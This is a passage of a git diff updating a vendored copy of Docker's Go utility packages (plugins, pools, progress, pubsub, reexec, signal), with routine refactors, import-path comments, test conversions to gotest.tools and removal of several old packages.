"github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures" import ( - "fmt" - aliasedio "io" "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture" ) -var ( - errFakeImport = 
fmt.Errorf("just to import fmt for imports tests") -) - type wobble struct { Some string Val string diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go index 1937d1786c..c603f6778c 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go @@ -1,4 +1,4 @@ -package otherfixture +package otherfixture // import "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture" // Spaceship is a fixture for tests type Spaceship struct{} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go index a1b1ac9567..fe7fa5ade6 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go @@ -136,7 +136,7 @@ func TestParseWithMultipleFuncs(t *testing.T) { } } -func TestParseWithUnamedReturn(t *testing.T) { +func TestParseWithUnnamedReturn(t *testing.T) { _, err := Parse(testFixture, "Fooer4") if !strings.HasSuffix(err.Error(), errBadReturn.Error()) { t.Fatalf("expected ErrBadReturn, got %v", err) diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins.go b/vendor/github.com/docker/docker/pkg/plugins/plugins.go index c0059cba75..6962079df9 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/plugins.go +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins.go @@ -20,17 +20,20 @@ // if err != nil { // return fmt.Errorf("Error looking up volume plugin example: %v", err) // } -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "errors" "sync" "time" - "github.com/Sirupsen/logrus" "github.com/docker/go-connections/tlsconfig" 
+ "github.com/sirupsen/logrus" ) +// ProtocolSchemeHTTPV1 is the name of the protocol used for interacting with plugins using this package. +const ProtocolSchemeHTTPV1 = "moby.plugins.http/v1" + var ( // ErrNotImplements is returned if the plugin does not implement the requested driver. ErrNotImplements = errors.New("Plugin does not implement the requested driver") @@ -88,6 +91,11 @@ func (p *Plugin) Client() *Client { return p.client } +// Protocol returns the protocol name/version used for plugins in this package. +func (p *Plugin) Protocol() string { + return ProtocolSchemeHTTPV1 +} + // IsV1 returns true for V1 plugins and false otherwise. func (p *Plugin) IsV1() bool { return true diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go deleted file mode 100644 index 9c5a0b5632..0000000000 --- a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go +++ /dev/null @@ -1,7 +0,0 @@ -package plugins - -// BasePath returns the path to which all paths returned by the plugin are relative to. -// For v1 plugins, this always returns the host's root directory. -func (p *Plugin) BasePath() string { - return "/" -} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go new file mode 100644 index 0000000000..cdfbe93458 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go @@ -0,0 +1,9 @@ +// +build !windows + +package plugins // import "github.com/docker/docker/pkg/plugins" + +// ScopedPath returns the path scoped to the plugin's rootfs. +// For v1 plugins, this always returns the path unchanged as v1 plugins run directly on the host. 
+func (p *Plugin) ScopedPath(s string) string { + return s +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go index 3c8d8feb83..ddf1d786c6 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go @@ -1,8 +1,7 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" -// BasePath returns the path to which all paths returned by the plugin are relative to. -// For Windows v1 plugins, this returns an empty string, since the plugin is already aware -// of the absolute path of the mount. -func (p *Plugin) BasePath() string { - return "" +// ScopedPath returns the path scoped to the plugin's rootfs. +// For v1 plugins, this always returns the path unchanged as v1 plugins run directly on the host. +func (p *Plugin) ScopedPath(s string) string { + return s } diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go index 5be146af65..76d3bdb712 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go @@ -1,4 +1,4 @@ -package transport +package transport // import "github.com/docker/docker/pkg/plugins/transport" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go new file mode 100644 index 0000000000..78ab23724b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go @@ -0,0 +1,21 @@ +package transport // import "github.com/docker/docker/pkg/plugins/transport" + +import ( + "io" + "net/http" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestHTTPTransport(t *testing.T) { + var r io.Reader + roundTripper := &http.Transport{} + 
newTransport := NewHTTPTransport(roundTripper, "http", "0.0.0.0") + request, err := newTransport.NewRequest("", r) + if err != nil { + t.Fatal(err) + } + assert.Check(t, is.Equal("POST", request.Method)) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go index d7f1e2100c..9cb13335a8 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go @@ -1,4 +1,4 @@ -package transport +package transport // import "github.com/docker/docker/pkg/plugins/transport" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/pools/pools.go b/vendor/github.com/docker/docker/pkg/pools/pools.go index 5c5aead698..46339c282f 100644 --- a/vendor/github.com/docker/docker/pkg/pools/pools.go +++ b/vendor/github.com/docker/docker/pkg/pools/pools.go @@ -7,7 +7,7 @@ // // Utility functions which operate on pools should be added to this // package to allow them to be reused. -package pools +package pools // import "github.com/docker/docker/pkg/pools" import ( "bufio" @@ -17,15 +17,16 @@ import ( "github.com/docker/docker/pkg/ioutils" ) +const buffer32K = 32 * 1024 + var ( // BufioReader32KPool is a pool which returns bufio.Reader with a 32K buffer. BufioReader32KPool = newBufioReaderPoolWithSize(buffer32K) // BufioWriter32KPool is a pool which returns bufio.Writer with a 32K buffer. BufioWriter32KPool = newBufioWriterPoolWithSize(buffer32K) + buffer32KPool = newBufferPoolWithSize(buffer32K) ) -const buffer32K = 32 * 1024 - // BufioReaderPool is a bufio reader that uses sync.Pool. 
type BufioReaderPool struct { pool sync.Pool @@ -54,11 +55,31 @@ func (bufPool *BufioReaderPool) Put(b *bufio.Reader) { bufPool.pool.Put(b) } +type bufferPool struct { + pool sync.Pool +} + +func newBufferPoolWithSize(size int) *bufferPool { + return &bufferPool{ + pool: sync.Pool{ + New: func() interface{} { return make([]byte, size) }, + }, + } +} + +func (bp *bufferPool) Get() []byte { + return bp.pool.Get().([]byte) +} + +func (bp *bufferPool) Put(b []byte) { + bp.pool.Put(b) +} + // Copy is a convenience wrapper which uses a buffer to avoid allocation in io.Copy. func Copy(dst io.Writer, src io.Reader) (written int64, err error) { - buf := BufioReader32KPool.Get(src) - written, err = io.Copy(dst, buf) - BufioReader32KPool.Put(buf) + buf := buffer32KPool.Get() + written, err = io.CopyBuffer(dst, src, buf) + buffer32KPool.Put(buf) return } diff --git a/vendor/github.com/docker/docker/pkg/pools/pools_test.go b/vendor/github.com/docker/docker/pkg/pools/pools_test.go index 1661b780c9..7ff01ce3d5 100644 --- a/vendor/github.com/docker/docker/pkg/pools/pools_test.go +++ b/vendor/github.com/docker/docker/pkg/pools/pools_test.go @@ -1,4 +1,4 @@ -package pools +package pools // import "github.com/docker/docker/pkg/pools" import ( "bufio" @@ -6,6 +6,9 @@ import ( "io" "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestBufioReaderPoolGetWithNoReaderShouldCreateOne(t *testing.T) { @@ -92,22 +95,16 @@ func TestBufioWriterPoolPutAndGet(t *testing.T) { buf := new(bytes.Buffer) bw := bufio.NewWriter(buf) writer := BufioWriter32KPool.Get(bw) - if writer == nil { - t.Fatalf("BufioReaderPool should not return a nil writer.") - } + assert.Assert(t, writer != nil) + written, err := writer.Write([]byte("foobar")) - if err != nil { - t.Fatal(err) - } - if written != 6 { - t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written) - } + assert.NilError(t, err) + assert.Check(t, is.Equal(6, written)) + // Make sure we Flush all the way ? 
writer.Flush() bw.Flush() - if len(buf.Bytes()) != 6 { - t.Fatalf("The buffer should contain 6 bytes ('foobar') but contains %v ('%v')", buf.Bytes(), string(buf.Bytes())) - } + assert.Check(t, is.Len(buf.Bytes(), 6)) // Reset the buffer buf.Reset() BufioWriter32KPool.Put(writer) @@ -159,3 +156,8 @@ func TestNewWriteCloserWrapperWithAWriteCloser(t *testing.T) { t.Fatalf("The ReaderCloser should have been closed, it is not.") } } + +func TestBufferPoolPutAndGet(t *testing.T) { + buf := buffer32KPool.Get() + buffer32KPool.Put(buf) +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progress.go b/vendor/github.com/docker/docker/pkg/progress/progress.go index fcf31173cf..9aea591954 100644 --- a/vendor/github.com/docker/docker/pkg/progress/progress.go +++ b/vendor/github.com/docker/docker/pkg/progress/progress.go @@ -1,4 +1,4 @@ -package progress +package progress // import "github.com/docker/docker/pkg/progress" import ( "fmt" @@ -16,6 +16,11 @@ type Progress struct { Current int64 Total int64 + // If true, don't show xB/yB + HideCounts bool + // If not empty, use units instead of bytes for counts + Units string + // Aux contains extra information not presented to the user, such as // digests for push signing. 
Aux interface{} diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader.go b/vendor/github.com/docker/docker/pkg/progress/progressreader.go index 6b3927eecf..7ca07dc640 100644 --- a/vendor/github.com/docker/docker/pkg/progress/progressreader.go +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader.go @@ -1,4 +1,4 @@ -package progress +package progress // import "github.com/docker/docker/pkg/progress" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go index b14d401561..e7081cc1f4 100644 --- a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go @@ -1,4 +1,4 @@ -package progress +package progress // import "github.com/docker/docker/pkg/progress" import ( "bytes" @@ -14,7 +14,7 @@ func TestOutputOnPrematureClose(t *testing.T) { pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read") - part := make([]byte, 4, 4) + part := make([]byte, 4) _, err := io.ReadFull(pr, part) if err != nil { pr.Close() diff --git a/vendor/github.com/docker/docker/pkg/promise/promise.go b/vendor/github.com/docker/docker/pkg/promise/promise.go deleted file mode 100644 index dd52b9082f..0000000000 --- a/vendor/github.com/docker/docker/pkg/promise/promise.go +++ /dev/null @@ -1,11 +0,0 @@ -package promise - -// Go is a basic promise implementation: it wraps calls a function in a goroutine, -// and returns a channel which will later return the function's return value. 
-func Go(f func() error) chan error { - ch := make(chan error, 1) - go func() { - ch <- f() - }() - return ch -} diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go index 09364617e4..76033ed9e4 100644 --- a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go @@ -1,4 +1,4 @@ -package pubsub +package pubsub // import "github.com/docker/docker/pkg/pubsub" import ( "sync" @@ -53,6 +53,16 @@ func (p *Publisher) SubscribeTopic(topic topicFunc) chan interface{} { return ch } +// SubscribeTopicWithBuffer adds a new subscriber that filters messages sent by a topic. +// The returned channel has a buffer of the specified size. +func (p *Publisher) SubscribeTopicWithBuffer(topic topicFunc, buffer int) chan interface{} { + ch := make(chan interface{}, buffer) + p.m.Lock() + p.subscribers[ch] = topic + p.m.Unlock() + return ch +} + // Evict removes the specified subscriber from receiving any more messages. 
func (p *Publisher) Evict(sub chan interface{}) { p.m.Lock() diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go index d6b0a1d59a..98e158248f 100644 --- a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go @@ -1,4 +1,4 @@ -package pubsub +package pubsub // import "github.com/docker/docker/pkg/pubsub" import ( "fmt" @@ -20,7 +20,7 @@ func TestSendToOneSub(t *testing.T) { func TestSendToMultipleSubs(t *testing.T) { p := NewPublisher(100*time.Millisecond, 10) - subs := []chan interface{}{} + var subs []chan interface{} subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe()) p.Publish("hi") @@ -52,7 +52,7 @@ func TestEvictOneSub(t *testing.T) { func TestClosePublisher(t *testing.T) { p := NewPublisher(100*time.Millisecond, 10) - subs := []chan interface{}{} + var subs []chan interface{} subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe()) p.Close() @@ -99,7 +99,7 @@ func newTestSubscriber(p *Publisher) *testSubscriber { // for testing with -race func TestPubSubRace(t *testing.T) { p := NewPublisher(0, 1024) - var subs [](*testSubscriber) + var subs []*testSubscriber for j := 0; j < 50; j++ { subs = append(subs, newTestSubscriber(p)) } @@ -120,7 +120,7 @@ func BenchmarkPubSub(b *testing.B) { for i := 0; i < b.N; i++ { b.StopTimer() p := NewPublisher(0, 1024) - var subs [](*testSubscriber) + var subs []*testSubscriber for j := 0; j < 50; j++ { subs = append(subs, newTestSubscriber(p)) } diff --git a/vendor/github.com/docker/docker/pkg/random/random.go b/vendor/github.com/docker/docker/pkg/random/random.go deleted file mode 100644 index 70de4d1304..0000000000 --- a/vendor/github.com/docker/docker/pkg/random/random.go +++ /dev/null @@ -1,71 +0,0 @@ -package random - -import ( - cryptorand "crypto/rand" - "io" - "math" - "math/big" - "math/rand" - "sync" - "time" -) - -// Rand is a global 
*rand.Rand instance, which initialized with NewSource() source. -var Rand = rand.New(NewSource()) - -// Reader is a global, shared instance of a pseudorandom bytes generator. -// It doesn't consume entropy. -var Reader io.Reader = &reader{rnd: Rand} - -// copypaste from standard math/rand -type lockedSource struct { - lk sync.Mutex - src rand.Source -} - -func (r *lockedSource) Int63() (n int64) { - r.lk.Lock() - n = r.src.Int63() - r.lk.Unlock() - return -} - -func (r *lockedSource) Seed(seed int64) { - r.lk.Lock() - r.src.Seed(seed) - r.lk.Unlock() -} - -// NewSource returns math/rand.Source safe for concurrent use and initialized -// with current unix-nano timestamp -func NewSource() rand.Source { - var seed int64 - if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil { - // This should not happen, but worst-case fallback to time-based seed. - seed = time.Now().UnixNano() - } else { - seed = cryptoseed.Int64() - } - return &lockedSource{ - src: rand.NewSource(seed), - } -} - -type reader struct { - rnd *rand.Rand -} - -func (r *reader) Read(b []byte) (int, error) { - i := 0 - for { - val := r.rnd.Int63() - for val > 0 { - b[i] = byte(val) - i++ - if i == len(b) { - return i, nil - } - val >>= 8 - } - } -} diff --git a/vendor/github.com/docker/docker/pkg/random/random_test.go b/vendor/github.com/docker/docker/pkg/random/random_test.go deleted file mode 100644 index cf405f78cb..0000000000 --- a/vendor/github.com/docker/docker/pkg/random/random_test.go +++ /dev/null @@ -1,22 +0,0 @@ -package random - -import ( - "math/rand" - "sync" - "testing" -) - -// for go test -v -race -func TestConcurrency(t *testing.T) { - rnd := rand.New(NewSource()) - var wg sync.WaitGroup - - for i := 0; i < 10; i++ { - wg.Add(1) - go func() { - rnd.Int63() - wg.Done() - }() - } - wg.Wait() -} diff --git a/vendor/github.com/docker/docker/pkg/reexec/README.md b/vendor/github.com/docker/docker/pkg/reexec/README.md index 45592ce85a..6658f69b69 100644 
--- a/vendor/github.com/docker/docker/pkg/reexec/README.md +++ b/vendor/github.com/docker/docker/pkg/reexec/README.md @@ -1,4 +1,4 @@ -## reexec +# reexec The `reexec` package facilitates the busybox style reexec of the docker binary that we require because of the forking limitations of using Go. Handlers can be registered with a name and the argv 0 of diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go index 34ae2a9dcd..efea71794f 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go @@ -1,10 +1,10 @@ -// +build linux - -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" "syscall" + + "golang.org/x/sys/unix" ) // Self returns the path to the current process's binary. @@ -22,7 +22,7 @@ func Command(args ...string) *exec.Cmd { Path: Self(), Args: args, SysProcAttr: &syscall.SysProcAttr{ - Pdeathsig: syscall.SIGTERM, + Pdeathsig: unix.SIGTERM, }, } } diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go index 778a720e3b..ceaabbdeee 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go @@ -1,6 +1,6 @@ -// +build freebsd solaris darwin +// +build freebsd darwin -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go index 76edd82427..09fb4b2d29 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go @@ -1,12 +1,12 @@ -// +build !linux,!windows,!freebsd,!solaris,!darwin +// +build !linux,!windows,!freebsd,!darwin 
-package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" ) -// Command is unsupported on operating systems apart from Linux, Windows, Solaris and Darwin. +// Command is unsupported on operating systems apart from Linux, Windows, and Darwin. func Command(args ...string) *exec.Cmd { return nil } diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go index ca871c4227..438226890f 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go +++ b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "os/exec" diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec.go b/vendor/github.com/docker/docker/pkg/reexec/reexec.go index c56671d919..f8ccddd599 100644 --- a/vendor/github.com/docker/docker/pkg/reexec/reexec.go +++ b/vendor/github.com/docker/docker/pkg/reexec/reexec.go @@ -1,4 +1,4 @@ -package reexec +package reexec // import "github.com/docker/docker/pkg/reexec" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go b/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go new file mode 100644 index 0000000000..44675e7b63 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go @@ -0,0 +1,52 @@ +package reexec // import "github.com/docker/docker/pkg/reexec" + +import ( + "os" + "os/exec" + "testing" + + "gotest.tools/assert" +) + +func init() { + Register("reexec", func() { + panic("Return Error") + }) + Init() +} + +func TestRegister(t *testing.T) { + defer func() { + if r := recover(); r != nil { + assert.Equal(t, `reexec func already registered under name "reexec"`, r) + } + }() + Register("reexec", func() {}) +} + +func TestCommand(t *testing.T) { + cmd := Command("reexec") + w, err := cmd.StdinPipe() + assert.NilError(t, err, "Error 
on pipe creation: %v", err) + defer w.Close() + + err = cmd.Start() + assert.NilError(t, err, "Error on re-exec cmd: %v", err) + err = cmd.Wait() + assert.Error(t, err, "exit status 2") +} + +func TestNaiveSelf(t *testing.T) { + if os.Getenv("TEST_CHECK") == "1" { + os.Exit(2) + } + cmd := exec.Command(naiveSelf(), "-test.run=TestNaiveSelf") + cmd.Env = append(os.Environ(), "TEST_CHECK=1") + err := cmd.Start() + assert.NilError(t, err, "Unable to start command") + err = cmd.Wait() + assert.Error(t, err, "exit status 2") + + os.Args[0] = "mkdir" + assert.Check(t, naiveSelf() != os.Args[0]) +} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar.go b/vendor/github.com/docker/docker/pkg/registrar/registrar.go deleted file mode 100644 index 1e75ee995b..0000000000 --- a/vendor/github.com/docker/docker/pkg/registrar/registrar.go +++ /dev/null @@ -1,127 +0,0 @@ -// Package registrar provides name registration. It reserves a name to a given key. -package registrar - -import ( - "errors" - "sync" -) - -var ( - // ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved - ErrNameReserved = errors.New("name is reserved") - // ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved - ErrNameNotReserved = errors.New("name is not reserved") - // ErrNoSuchKey is returned when trying to find the names for a key which is not known - ErrNoSuchKey = errors.New("provided key does not exist") -) - -// Registrar stores indexes a list of keys and their registered names as well as indexes names and the key that they are registered to -// Names must be unique. -// Registrar is safe for concurrent access. 
-type Registrar struct { - idx map[string][]string - names map[string]string - mu sync.Mutex -} - -// NewRegistrar creates a new Registrar with the an empty index -func NewRegistrar() *Registrar { - return &Registrar{ - idx: make(map[string][]string), - names: make(map[string]string), - } -} - -// Reserve registers a key to a name -// Reserve is idempotent -// Attempting to reserve a key to a name that already exists results in an `ErrNameReserved` -// A name reservation is globally unique -func (r *Registrar) Reserve(name, key string) error { - r.mu.Lock() - defer r.mu.Unlock() - - if k, exists := r.names[name]; exists { - if k != key { - return ErrNameReserved - } - return nil - } - - r.idx[key] = append(r.idx[key], name) - r.names[name] = key - return nil -} - -// Release releases the reserved name -// Once released, a name can be reserved again -func (r *Registrar) Release(name string) { - r.mu.Lock() - defer r.mu.Unlock() - - key, exists := r.names[name] - if !exists { - return - } - - for i, n := range r.idx[key] { - if n != name { - continue - } - r.idx[key] = append(r.idx[key][:i], r.idx[key][i+1:]...) - break - } - - delete(r.names, name) - - if len(r.idx[key]) == 0 { - delete(r.idx, key) - } -} - -// Delete removes all reservations for the passed in key. -// All names reserved to this key are released. 
-func (r *Registrar) Delete(key string) { - r.mu.Lock() - for _, name := range r.idx[key] { - delete(r.names, name) - } - delete(r.idx, key) - r.mu.Unlock() -} - -// GetNames lists all the reserved names for the given key -func (r *Registrar) GetNames(key string) ([]string, error) { - r.mu.Lock() - defer r.mu.Unlock() - - names, exists := r.idx[key] - if !exists { - return nil, ErrNoSuchKey - } - return names, nil -} - -// Get returns the key that the passed in name is reserved to -func (r *Registrar) Get(name string) (string, error) { - r.mu.Lock() - key, exists := r.names[name] - r.mu.Unlock() - - if !exists { - return "", ErrNameNotReserved - } - return key, nil -} - -// GetAll returns all registered names -func (r *Registrar) GetAll() map[string][]string { - out := make(map[string][]string) - - r.mu.Lock() - // copy index into out - for id, names := range r.idx { - out[id] = names - } - r.mu.Unlock() - return out -} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go deleted file mode 100644 index 0c1ef312ae..0000000000 --- a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go +++ /dev/null @@ -1,119 +0,0 @@ -package registrar - -import ( - "reflect" - "testing" -) - -func TestReserve(t *testing.T) { - r := NewRegistrar() - - obj := "test1" - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } - - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } - - obj2 := "test2" - err := r.Reserve("test", obj2) - if err == nil { - t.Fatalf("expected error when reserving an already reserved name to another object") - } - if err != ErrNameReserved { - t.Fatal("expected `ErrNameReserved` error when attempting to reserve an already reserved name") - } -} - -func TestRelease(t *testing.T) { - r := NewRegistrar() - obj := "testing" - - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } - r.Release("test") - r.Release("test") // Ensure 
there is no panic here - - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } -} - -func TestGetNames(t *testing.T) { - r := NewRegistrar() - obj := "testing" - names := []string{"test1", "test2"} - - for _, name := range names { - if err := r.Reserve(name, obj); err != nil { - t.Fatal(err) - } - } - r.Reserve("test3", "other") - - names2, err := r.GetNames(obj) - if err != nil { - t.Fatal(err) - } - - if !reflect.DeepEqual(names, names2) { - t.Fatalf("Exepected: %v, Got: %v", names, names2) - } -} - -func TestDelete(t *testing.T) { - r := NewRegistrar() - obj := "testing" - names := []string{"test1", "test2"} - for _, name := range names { - if err := r.Reserve(name, obj); err != nil { - t.Fatal(err) - } - } - - r.Reserve("test3", "other") - r.Delete(obj) - - _, err := r.GetNames(obj) - if err == nil { - t.Fatal("expected error getting names for deleted key") - } - - if err != ErrNoSuchKey { - t.Fatal("expected `ErrNoSuchKey`") - } -} - -func TestGet(t *testing.T) { - r := NewRegistrar() - obj := "testing" - name := "test" - - _, err := r.Get(name) - if err == nil { - t.Fatal("expected error when key does not exist") - } - if err != ErrNameNotReserved { - t.Fatal(err) - } - - if err := r.Reserve(name, obj); err != nil { - t.Fatal(err) - } - - if _, err = r.Get(name); err != nil { - t.Fatal(err) - } - - r.Delete(obj) - _, err = r.Get(name) - if err == nil { - t.Fatal("expected error when key does not exist") - } - if err != ErrNameNotReserved { - t.Fatal(err) - } -} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal.go b/vendor/github.com/docker/docker/pkg/signal/signal.go index 68bb77cf58..88ef7b5ea2 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal.go @@ -1,6 +1,6 @@ // Package signal provides helper functions for dealing with signals across // various operating systems. 
-package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "fmt" @@ -13,7 +13,7 @@ import ( // CatchAll catches all signals and relays them to the specified channel. func CatchAll(sigc chan os.Signal) { - handledSigs := []os.Signal{} + var handledSigs []os.Signal for _, s := range SignalMap { handledSigs = append(handledSigs, s) } diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go index 946de87e94..ee5501e3d9 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go @@ -1,4 +1,4 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go index 6b9569bb75..764f90e264 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go @@ -1,4 +1,4 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go index d418cbe9e3..caed97c963 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go @@ -1,7 +1,9 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" + + "golang.org/x/sys/unix" ) const ( @@ -11,41 +13,40 @@ const ( // SignalMap is a map of Linux signals. 
var SignalMap = map[string]syscall.Signal{ - "ABRT": syscall.SIGABRT, - "ALRM": syscall.SIGALRM, - "BUS": syscall.SIGBUS, - "CHLD": syscall.SIGCHLD, - "CLD": syscall.SIGCLD, - "CONT": syscall.SIGCONT, - "FPE": syscall.SIGFPE, - "HUP": syscall.SIGHUP, - "ILL": syscall.SIGILL, - "INT": syscall.SIGINT, - "IO": syscall.SIGIO, - "IOT": syscall.SIGIOT, - "KILL": syscall.SIGKILL, - "PIPE": syscall.SIGPIPE, - "POLL": syscall.SIGPOLL, - "PROF": syscall.SIGPROF, - "PWR": syscall.SIGPWR, - "QUIT": syscall.SIGQUIT, - "SEGV": syscall.SIGSEGV, - "STKFLT": syscall.SIGSTKFLT, - "STOP": syscall.SIGSTOP, - "SYS": syscall.SIGSYS, - "TERM": syscall.SIGTERM, - "TRAP": syscall.SIGTRAP, - "TSTP": syscall.SIGTSTP, - "TTIN": syscall.SIGTTIN, - "TTOU": syscall.SIGTTOU, - "UNUSED": syscall.SIGUNUSED, - "URG": syscall.SIGURG, - "USR1": syscall.SIGUSR1, - "USR2": syscall.SIGUSR2, - "VTALRM": syscall.SIGVTALRM, - "WINCH": syscall.SIGWINCH, - "XCPU": syscall.SIGXCPU, - "XFSZ": syscall.SIGXFSZ, + "ABRT": unix.SIGABRT, + "ALRM": unix.SIGALRM, + "BUS": unix.SIGBUS, + "CHLD": unix.SIGCHLD, + "CLD": unix.SIGCLD, + "CONT": unix.SIGCONT, + "FPE": unix.SIGFPE, + "HUP": unix.SIGHUP, + "ILL": unix.SIGILL, + "INT": unix.SIGINT, + "IO": unix.SIGIO, + "IOT": unix.SIGIOT, + "KILL": unix.SIGKILL, + "PIPE": unix.SIGPIPE, + "POLL": unix.SIGPOLL, + "PROF": unix.SIGPROF, + "PWR": unix.SIGPWR, + "QUIT": unix.SIGQUIT, + "SEGV": 